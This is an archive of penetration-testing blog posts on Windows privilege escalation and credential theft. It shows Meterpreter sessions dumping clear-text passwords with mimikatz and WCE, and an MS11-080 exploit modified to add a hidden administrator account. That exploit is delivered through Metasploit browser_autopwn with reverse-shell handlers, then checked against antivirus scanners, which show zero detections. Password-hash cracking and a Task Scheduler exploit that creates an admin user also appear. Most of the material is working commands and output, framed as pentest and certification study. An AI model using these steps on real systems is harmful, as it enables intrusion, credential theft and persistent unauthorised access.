Archive for category Local Privilege Escalation

Dumping Clear Text Passwords (Revisited)

Finally, mimikatz has been accepted into the Metasploit trunk! This post is an update to an earlier post named Dumping Clear Text Passwords. Now, it’s easier than ever to dump clear text passwords from within a Meterpreter session. Let’s walk through an example.

At the time of this writing, “msfupdate” was not pulling down the mimikatz extension for me, so I just copied the required files to their respective locations found here. Now, once we attain a Meterpreter session, we just load the extension and call “wdigest”.

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID   Package   Domain       User            Password
------   -------   ------       ----            --------
0;999    NTLM      WORKGROUP    VULNXP$ 
0;997    Negotiate NT AUTHORITY LOCAL SERVICE 
0;49975  NTLM 
0;996    Negotiate NT AUTHORITY NETWORK SERVICE 
0;173813 NTLM      VULNXP       TrustedSec      SecurityMadeSimple!

Easy as pie. I can’t wait to use this on our next pentest!

No Comments

Dumping Clear Text Passwords

If you haven’t heard, there’s a tool that was released a little over a year now, with little fan fair, that can dump all logged on credentials in clear text. It’s called mimikatz. Passing the Hash is fun, but you can’t beat a good clear text password. Am I right? You can download the executable and dependent DLL from Benjamin’s (the author) site, as well as view a detailed explanation of how it works from his presentation at PHDays 2012. I figured I would finally check this tool out and see what it has to offer. A little Googling around and I found a post on PaulDotCom detailing how to upload and execute the tool through a Meterpreter session. One potential problem with this method is that it can easily be stopped by anti-virus as soon as it hits the disk. Mubix is currently working on a solution to implement the function of mimikatz directly into the Metasploit Framework. I think everyone looks forward to this addition. In the meantime, there is another way to dump clear text passwords within a Meterpreter session without ever touching the disk. First, Hernan Ochoa from Amplia Security has updated his tool, Windows Credential Editor (WCE), to also dump clear text passwords. It’s currently in beta, and hasn’t been added to the BackTrack repository yet, so we’ll have to download it from Amplia Security’s site directly. Next, all we need to do is use Meterpreter’s “execute” function to inject our executable directly into memory of the remote machine and run it to dump the passwords for us. Egyp7, one of the Metasploit Framework developers, wrote a post a couple of months ago showing us just how to do this. Let’s look at our Meterpreter “execute” options:

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

-H        Create the process hidden from view.
-a <opt>  The arguments to pass to the command.
-c        Channelized I/O (required for interaction).
-d <opt>  The 'dummy' executable to launch when using -m.
-f <opt>  The executable command to run.
-h        Help menu.
-i        Interact with the process after creating it.
-k        Execute process on the meterpreters current desktop
-m        Execute from memory.
-s <opt>  Execute process in a given session as the session user
-t        Execute process with currently impersonated thread token

And here are our options for WCE:

root@bt:/pentest/passwords/wce/beta# wine wce.exe -h
fixme:heap:HeapSetInformation (nil) 1 (nil) 0
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Options:
-l        List logon sessions and NTLM credentials (default).
-s        Changes NTLM credentials of current logon session.
          Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-r        Lists logon sessions and NTLM credentials indefinitely.
          Refreshes every 5 seconds if new sessions are found.
          Optional: -r<refresh interval>.
-c        Run <cmd> in a new session with the specified NTLM credentials.
          Parameters: <cmd>.
-e        Lists logon sessions NTLM credentials indefinitely.
          Refreshes every time a logon event occurs.
-o        saves all output to a file.
          Parameters: <filename>.
-i        Specify LUID instead of use current logon session.
          Parameters: <luid>.
-d        Delete NTLM credentials from logon session.
          Parameters: <luid>.
-a        Use Addresses.
          Parameters: <addresses>
-f        Force 'safe mode'.
-g        Generate LM & NT Hash.
          Parameters: <password>.
-K        Dump Kerberos tickets to file (unix & 'windows wce' format)
-k        Read Kerberos tickets from file and insert into Windows cache
-w        Dump cleartext passwords stored by the digest authentication package
-v        verbose output.

We’re simply going to use Meterpreter’s “-H” option to create a hidden process, “-m” to execute the process from memory, and the “-a” option to send the arguments to WCE that are needed to dump the clear text passwords and output them to a file.

meterpreter > execute -H -m -f /pentest/passwords/wce/beta/wce.exe -a "-w -o output.txt"
Process 2900 created.
meterpreter > cat output.txt

MaryPoppins\VULNXP:Supercalifragilisticexpialidocious
NETWORK SERVICE\WORKGROUP:Supercalifragilisticexpialidocious
meterpreter > del output.txt

Wow, I would have never guessed that password…

<Update: Dumping Clear Text Passwords (Revisited)>

No Comments

MS11-080: Privilege Escalation (Windows)

So, I’ve been neglecting this blog lately, while attending the Pentesting with BackTrack course and now studying for my Offensive Security Certified Professional exam. In preparation for the exam, I figured I would start looking for some local privilege escalation exploits. So, I went to the old faithful exploit-db.com and found MS11-080 Afd.sys Privilege Escalation Exploit, which exploits MS11-080. This exploit was written in Python, so we’re going to have to use a trick we learned earlier with PyInstaller to utilize this on a machine that doesn’t already have Python installed. Remember, that we need to setup our Python environment on a Windows machine to compile this exploit (no cross-compile support).

Python environment setup:

 1. Install Python
 2. Install PyInstaller
 3. Install PyWin32 (specific to the version of Python installed above)

PyInstaller compile:

 1. Download the python exploit code to c:\Temp\ms11-080.py
 2. c:> PATH=C:\<Path to python.exe>
 3. c:> cd <Path to PyInstaller.exe>
 4. c:> Python Configure.py
 5. c:> Python Makespec.py --onefile c:\Temp\ms11-080.py
            (creates \ms11-080\ms11-080.spec)
 6. c:> Python Build.py \ms11-080\ms11-080.spec
            (creates \ms11-080\dist\ms11-080.exe)

This will work fine for a gui session. Just run the executable from a command line (ms11-080.exe -O <XP|2K3>), and a nice red console is spawned, running as SYSTEM.

MS11-080 Shell

Let’s try to make this useful for a remote shell session from Meterpreter. Notice, line 238 of the script spawns the elevated shell:

os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")

I’m just going to modify this line to add a new user “spoonman”, then add that user to the local Administrators group. Then I’ll recompile to run on my remote shell.

os.system("cmd.exe /C net user spoonman Hacked! /add")
os.system("cmd.exe /C net localgroup Administrators spoonman /add")

Let’s use Metaploit’s browser_autopwn to get a shell session on the remote machine in the user context.

msf > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
LHOST                        yes       The IP address to use for reverse-connect payloads
SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(browser_autopwn) > set LHOST 192.168.0.119
LHOST => 192.168.0.119
msf  auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf  auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2011-12-10 17:08:21 -0500
msf  auxiliary(browser_autopwn) >
[*] Done in 2.727867777 seconds

[*] Starting exploit modules on host 192.168.0.119...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QqBTUdAfwgdJ
[*]  Local IP: http://192.168.0.119:8080/QqBTUdAfwgdJ
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UhJrXyAxDFy
[*]  Local IP: http://192.168.0.119:8080/UhJrXyAxDFy
[*] Server started.

<snip>

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.119:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.0.119:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.119:7777
[*] Starting the payload handler...

[*] --- Done, found 23 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.0.119:8080/
[*] Server started.
[*] 192.168.0.116    Browser Autopwn request '/'
[*] 192.168.0.116    Browser Autopwn request '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AyOmVuLXVzOng4NjpNU0lFOjYuMDtTUDI6'
[*] 192.168.0.116    JavaScript Report: Microsoft Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2:
[*] 192.168.0.116    Reporting: {:os_name=>"Microsoft Windows", :os_flavor=>"XP", :os_sp=>"SP2", :os_lang=>"en-us", :arch=>"x86"}
[*] Responding with exploits
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.0.116:2117...
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.0.116:2118 (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to 192.168.0.116
[*] Meterpreter session 1 opened (192.168.0.119:3333 -> 192.168.0.116:2119) at 2011-12-10 17:10:10 -0500
[*] Session ID 1 (192.168.0.119:3333 -> 192.168.0.116:2119) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2200)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3836
[+] Successfully migrated to process 

msf  auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  1   meterpreter x86/win32  BUDLITE\user @ BUDLITE  192.168.0.119:3333 -> 192.168.0.116:2119

msf  auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: BUDLITE\user
meterpreter > getlwd
/opt/framework/msf3
meterpreter > lcd /var/www
meterpreter > upload ms11-080_adduser.exe
[*] uploading  : ms11-080_adduser.exe -> ms11-080_adduser.exe
[*] uploaded   : ms11-080_adduser.exe -> ms11-080_adduser.exe
meterpreter > shell
Process 3244 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>ms11-080_adduser.exe -O XP
ms11-080_adduser.exe -O XP
The command completed successfully.

The command completed successfully.

[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x80544a38L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806ce000L
[+] HaliQuerySystemInformation address: 0x806e4bbaL
[+] HalpSetSystemInformation address: 0x806e7436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
[*] Restoring token...
[+] Restore done! Have a nice day :)

C:\Documents and Settings\user\Desktop>net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
spoonman
The command completed successfully.

C:\Documents and Settings\user\Desktop>

Let’s run the compiled executable through VirusTotal:

Antivirus Version Last Update Result
AhnLab-V3 2011.12.10.00 2011.12.09
AntiVir 7.11.19.57 2011.12.09
Antiy-AVL 2.0.3.7 2011.12.10
Avast 6.0.1289.0 2011.12.10
AVG 10.0.0.1190 2011.12.10
BitDefender 7.2 2011.12.10
ByteHero 1.0.0.1 2011.12.07
CAT-QuickHeal 12.00 2011.12.10
ClamAV 0.97.3.0 2011.12.10
Commtouch 5.3.2.6 2011.12.10
Comodo 10911 2011.12.10
Emsisoft 5.1.0.11 2011.12.10
eSafe 7.0.17.0 2011.12.08
eTrust-Vet 37.0.9616 2011.12.09
F-Prot 4.6.5.141 2011.11.29
F-Secure 9.0.16440.0 2011.12.10
Fortinet 4.3.388.0 2011.12.10
GData 22 2011.12.10
Ikarus T3.1.1.109.0 2011.12.10
Jiangmin 13.0.900 2011.12.10
K7AntiVirus 9.119.5640 2011.12.09
Kaspersky 9.0.0.837 2011.12.10
McAfee 5.400.0.1158 2011.12.10
McAfee-GW-Edition 2010.1E 2011.12.10
Microsoft 1.7903 2011.12.10
NOD32 6691 2011.12.07
Norman 6.07.13 2011.12.10
nProtect 2011-12-10.03 2011.12.10
Panda 10.0.3.5 2011.12.10
PCTools 8.0.0.5 2011.12.10
Prevx 3.0 2011.12.10
Rising 23.87.03.02 2011.12.08
Sophos 4.72.0 2011.12.10
SUPERAntiSpyware 4.40.0.1006 2011.12.10
Symantec 20111.2.0.82 2011.12.10
TheHacker 6.7.0.1.354 2011.12.09
TrendMicro 9.500.0.1008 2011.12.10
TrendMicro-HouseCall 9.500.0.1008 2011.12.10
VBA32 3.12.16.4 2011.12.09
VIPRE 11231 2011.12.10
ViRobot 2011.12.10.4819 2011.12.10
VirusBuster 14.1.109.0 2011.12.10

Nope, nothing to see here. Get it while it’s hot!

No Comments

Password Cracking

In the last post, I mentioned that it may take quite a long time to crack an NT hash, but there are many methods for cracking passwords.  I will walk you through one simple method.  There is an excellent guide posted on Offsec that describes the many other various methods available.

One of the fastest methods I know to crack passwords is by using Rainbow Tables.  Instead of running through all of the combinations to crack the hash in real-time, the tables are generated before-hand.  The main limitations of Rainbow Tables are the size and time it takes to generate them, although there are many pre-computed tables online that are available to download.  There are also a number of different versions of tables, so you need to know before hand what type of hash you are trying to crack (LM, NTLM, MD5, SHA1, etc.).

If you remember from the “Pass The Hash” post, we obtained the hash for the local Administrator account:

Administrator:500:NO PASSWORD*********************:8846F7EAEE8FB117AD06BDD830B7586C:::

We know that the hash is from a windows machine, so the hash is going to be either LM or NTLM.  Since the first byte of the hash is not available, we know that it is an NTLM hash.  So, we know we are going to need an NTLM table to crack this password.

Ophcrack is a very simple tool created by the original developers of Rainbow Tables.  It uses a custom version of the tables, so it can only be used with the tables available on the site.  There are two LiveCD’s available for download, one for LM hashes (XP LiveCD) and one for NTLM hashes (Vista LiveCD).  Since I like to do everything from BackTrack and Ophcrack is already available in the distribution, all we have to do is download the tables.  So, we just download the “Vista Free” table, insert our hash, and click “Crack”.

Twenty seconds later, we have the password “password”.  That was too easy.  This particular table is based on a dictionary, so it’s not going to crack anything too complicated.  Let’s try the hash for “P@ssw0rd”.  It contains an uppercase, lowercase, digit, and special character, but still isn’t a very secure password.

Password not found :-(  So, this table isn’t exactly fool proof, but it is a quick and dirty way to catch some low hanging fruit.

Happy Cracking!

No Comments

Local Privilege Escalation 2 (Windows)

This week I’m going to point you to an excellent Defcon 2010 talk given by Cesar Cerrudo from Argeniss, called Token Kidnapping’s Revenge.

Cesar goes through a deep explanation of how he used simple tools like Process Monitor and Process Explorer to find services that spawn multiple threads with impersonation permissions.  He used that information by enabling the debugging function of the service and opening a named pipe back to the local host running as the System account.  It’s a very interesting talk if you have the time to listen to it completely.

The exploit code is hosted on Exploit-DB.

The vulnerability was patched by Microsoft in MS10-059.

No Comments

Local Privilege Escalation (Windows)

I figure that my first post will be about local privilege escalation.  It sounds like a good place to start.  So where do we go first to find a current local exploit?  The wonderful Exploit-DB, maintained by Offensive Security.

The top exploit as of today was written by webDEViL and exploits Windows Task Scheduler:

http://www.exploit-db.com/exploits/15589/

Just copy the text to a file with a “wsf” extension and run it using cscript:

c:\cscript.exe exploit.wsf

As written, the script creates a user “test123” with the password “test123” in the local Administrators group.  Easy huh?

The vulnerability is still currently under CVE review at CVE-2010-3888.  It was identified by Kaspersky Labs and other researchers and was apparently found in the wild being used by the Stuxnet Virus that was found in July of this year.

So, what’s the takeaway from this post?  Exploit-DB is the first place to go for your exploitation needs.

This exploit was recently added to Metasploit and cleverly named Schelevator.  The vulnerability was also patched by Microsoft in MS10-092.

No Comments